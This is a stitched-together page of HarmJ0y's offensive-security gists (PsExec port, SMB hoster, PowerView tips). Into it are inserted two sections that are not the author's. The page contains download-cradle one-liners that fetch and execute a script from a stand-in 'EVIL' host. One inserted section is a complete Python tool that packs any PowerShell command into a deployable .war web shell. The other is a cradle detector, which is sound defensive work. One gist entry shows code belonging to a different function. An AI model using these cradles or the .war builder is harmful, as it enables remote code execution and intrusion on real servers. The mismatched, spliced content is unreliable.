Will HarmJ0y
Coding towards chaotic good while living on the decision boundary
@HarmJ0y
HarmJ0y / streams.ps1
Last active August 31, 2022 17:34
streams.ps1
# these functions allow you to enumerate, add, and remove alternate data streams
# they can function as a bootleg replacement for Sysinternals' streams.exe
function Find-Streams {
<#
.SYNOPSIS
Enumerates all alternate data streams for a specified path.
If no path is provided, the current path is used.
Author: @harmj0y
License: BSD 3-Clause
### Keybase proof
I hereby claim:
* I am harmj0y on github.
* I am harmj0y (https://keybase.io/harmj0y) on keybase.
* I have a public key whose fingerprint is FFD5 77A3 2B3A 2B41 11F4 383A FA2F 9AA5 3110 89D3
To claim this, I am signing this object:
@HarmJ0y
HarmJ0y / Invoke-LockWorkStation.ps1
Created May 3, 2015 21:11
Invoke-LockWorkStation
Function Invoke-LockWorkStation {
# region define P/Invoke types dynamically
# stolen from PowerSploit https://github.com/mattifestation/PowerSploit/blob/master/Mayhem/Mayhem.psm1
# thanks matt and chris :)
$DynAssembly = New-Object System.Reflection.AssemblyName('Win32')
$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32', $False)
$TypeBuilder = $ModuleBuilder.DefineType('Win32.User32', 'Public, Class')
$DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
@HarmJ0y
HarmJ0y / Invoke-WdigestDowngrade.ps1
Created May 22, 2015 16:33
Invoke-WdigestDowngrade
function Invoke-LockWorkStation {
# region define P/Invoke types dynamically
# stolen from PowerSploit https://github.com/mattifestation/PowerSploit/blob/master/Mayhem/Mayhem.psm1
# thanks matt and chris :)
$DynAssembly = New-Object System.Reflection.AssemblyName('Win32')
$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32', $False)
$TypeBuilder = $ModuleBuilder.DefineType('Win32.User32', 'Public, Class')
$DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
@HarmJ0y
HarmJ0y / smb_hoster.py
Created June 4, 2015 00:39
smb_hoster.py
#!/usr/bin/python
from impacket import smbserver
import sys, argparse, threading, ConfigParser, time, os
class ThreadedSMBServer(threading.Thread):
"""
Threaded SMB server that can be spun up locally.
"""
@HarmJ0y
HarmJ0y / Invoke-Psexec.ps1
Last active September 12, 2022 02:41
Invoke-Psexec
function Invoke-PsExec {
<#
.SYNOPSIS
This function is a rough port of Metasploit's psexec functionality.
It utilizes Windows API calls to open up the service manager on
a remote machine, creates/run a service with an associated binary
path or command, and then cleans everything up.
Either a -Command or a custom -ServiceEXE can be specified.
For -Commands, a -ResultsFile can also be specified to retrieve the
@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active May 4, 2024 08:16
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
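A detection-side counterpart to the cradles listed above, added here as an example (it is not part of HarmJ0y's gist): a small Python classifier that scans process command lines, as Sysmon Event ID 1 or Security 4688 would record them, for an execution primitive (IEX / Invoke-Expression) paired with a fetch primitive (Net.WebClient, iwr, the InternetExplorer.Application and Msxml2.XMLHTTP COM objects, and a few related ones). Because the same cradles are routinely shipped behind `-EncodedCommand`, the classifier decodes that payload (base64 over UTF-16LE) and scans it too. The four sample command lines and the indicator lists are constructed assumptions of this example, not data from the page.

```python
import base64
import re
from typing import Optional

# Constructed sample process command lines. Line 2 hides a cradle behind -Enc;
# line 4 fetches a file but never executes it, so it must not be flagged.
_ENC_PAYLOAD = base64.b64encode(
    "IEX (iwr 'http://EVIL/evil.ps1')".encode("utf-16le")
).decode("ascii")
SAMPLE_LINES = [
    "powershell.exe -NoP -W Hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://EVIL/evil.ps1')\"",
    f"powershell.exe -NoP -NonI -W Hidden -Enc {_ENC_PAYLOAD}",
    "powershell.exe -c \"Get-Service | Where-Object Status -eq Running\"",
    "powershell.exe -c \"Invoke-WebRequest -Uri http://intranet/app.msi -OutFile C:\\Temp\\app.msi\"",
]

# A cradle is an execution primitive fed by a fetch primitive. Either alone is
# noise (IEX over a local string, iwr pulling an installer); both in one
# command line is the signal. Patterns are matched against lower-cased text.
EXEC_PATTERNS = [r"\biex\b", r"invoke-expression"]
FETCH_PATTERNS = [
    r"net\.webclient", r"downloadstring", r"downloadfile",
    r"\biwr\b", r"invoke-webrequest", r"invoke-restmethod",
    r"internetexplorer\.application", r"msxml2\.xmlhttp", r"winhttp\.winhttprequest",
]
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script behind -EncodedCommand; None if absent or malformed."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(cmdline: str) -> dict:
    """Scan the command line plus any decoded -Enc payload for cradle indicators."""
    decoded = decode_encoded_command(cmdline)
    text = (cmdline + " " + decoded if decoded else cmdline).lower()
    exec_hits = [p for p in EXEC_PATTERNS if re.search(p, text)]
    fetch_hits = [p for p in FETCH_PATTERNS if re.search(p, text)]
    return {
        "cradle": bool(exec_hits and fetch_hits),
        "exec": exec_hits,
        "fetch": fetch_hits,
        "decoded": decoded,
    }


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        verdict = classify(line)
        print(("CRADLE  " if verdict["cradle"] else "        ") + line[:72])
```

The pairing rule is what keeps this usable: flagging every `iwr` would bury the alerts in software installs, and flagging every `IEX` would miss nothing but also explain nothing. Decoding `-Enc` before matching is the step most naive rules skip, and it is why line 2 is caught even though its raw command line contains none of the indicator strings.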
@HarmJ0y
HarmJ0y / psWar.py
Created September 15, 2015 07:51
PsWar
#!/usr/bin/python
# Code that quickly generates a deployable .war for a PowerShell one-liner
import zipfile
import StringIO
import sys
def generatePsWar(psCmd, appName):
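The preview stops at the function definition. The following is an added example in the same spirit, not the gist's code and not a reproduction of it: it builds a .war in memory whose single JSP hands a PowerShell one-liner to powershell.exe through `-Enc` (base64 over UTF-16LE, so no quoting inside the one-liner can break the JSP or the shell), then unpacks the archive again the way an analyst handling a suspicious .war would. The web.xml, the JSP body, the app-name restriction and the benign sample command are assumptions of this example.

```python
import base64
import io
import re
import zipfile

# Constructed sample command (benign). In the gist's use case this is where a
# download cradle such as the ones in DownloadCradles.ps1 would go.
SAMPLE_CMD = "Write-Output 'hello from the war'"

# Minimal Servlet 2.4 deployment descriptor: one JSP, mapped to /<name>.
WEB_XML = """<?xml version="1.0" encoding="ISO-8859-1"?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee" version="2.4">
  <servlet>
    <servlet-name>@NAME@</servlet-name>
    <jsp-file>/@NAME@.jsp</jsp-file>
  </servlet>
  <servlet-mapping>
    <servlet-name>@NAME@</servlet-name>
    <url-pattern>/@NAME@</url-pattern>
  </servlet-mapping>
</web-app>
"""

# JSP that launches powershell.exe. exec(String[]) avoids a second round of
# tokenisation by cmd.exe; the command itself travels as -Enc.
JSP = """<%@ page import="java.io.*" %>
<%
    String[] cmd = {"powershell.exe", "-NoP", "-NonI", "-W", "Hidden", "-Enc", "@ENCODED@"};
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) { out.println(line); }
    p.waitFor();
%>
"""

# The app name becomes a context path and a file name inside the archive, so
# it is restricted to a safe character set (assumption of this example).
NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def encode_ps(ps_cmd: str) -> str:
    """powershell.exe -EncodedCommand expects base64 over UTF-16LE, not UTF-8."""
    return base64.b64encode(ps_cmd.encode("utf-16le")).decode("ascii")


def build_war(ps_cmd: str, app_name: str) -> bytes:
    """Return the bytes of a deployable .war wrapping ps_cmd."""
    if not NAME_RE.match(app_name):
        raise ValueError(f"unsafe app name: {app_name!r}")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML.replace("@NAME@", app_name))
        war.writestr(f"{app_name}.jsp", JSP.replace("@ENCODED@", encode_ps(ps_cmd)))
    return buf.getvalue()


def inspect_war(war_bytes: bytes) -> dict:
    """The defender's half: list the members and recover the PowerShell command
    from the JSP's -Enc argument."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        members = sorted(war.namelist())
        jsp_name = next(n for n in members if n.endswith(".jsp"))
        src = war.read(jsp_name).decode("utf-8")
    m = re.search(r'"-Enc",\s*"([A-Za-z0-9+/=]+)"', src)
    command = base64.b64decode(m.group(1)).decode("utf-16le") if m else None
    return {"members": members, "jsp": jsp_name, "command": command}


if __name__ == "__main__":
    war = build_war(SAMPLE_CMD, "status")
    with open("status.war", "wb") as fh:
        fh.write(war)
    print(inspect_war(war))
```

Deploying the resulting file through a container's management interface (for example Tomcat's manager application) and requesting /status/status is the usage the gist's description implies; on the other side, `inspect_war` is the two-line triage that turns an opaque .war found in a webapps directory back into the command it runs.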
@HarmJ0y
HarmJ0y / Translate-Canonical.ps1
Created September 17, 2015 22:39
Translate-Canonical
function Translate-Canonical {
<#
.SYNOPSIS
Converts a user@fqdn to NT4 format.
.LINK
http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats
#>
[CmdletBinding()]
param(
[String]$User
@HarmJ0y
HarmJ0y / PowerView-2.0-tricks.ps1
Last active April 8, 2024 03:40
PowerView-2.0 tips and tricks
# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
# has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GroupName <GROUP> -Recurse
# get the effective set of users who can administer a server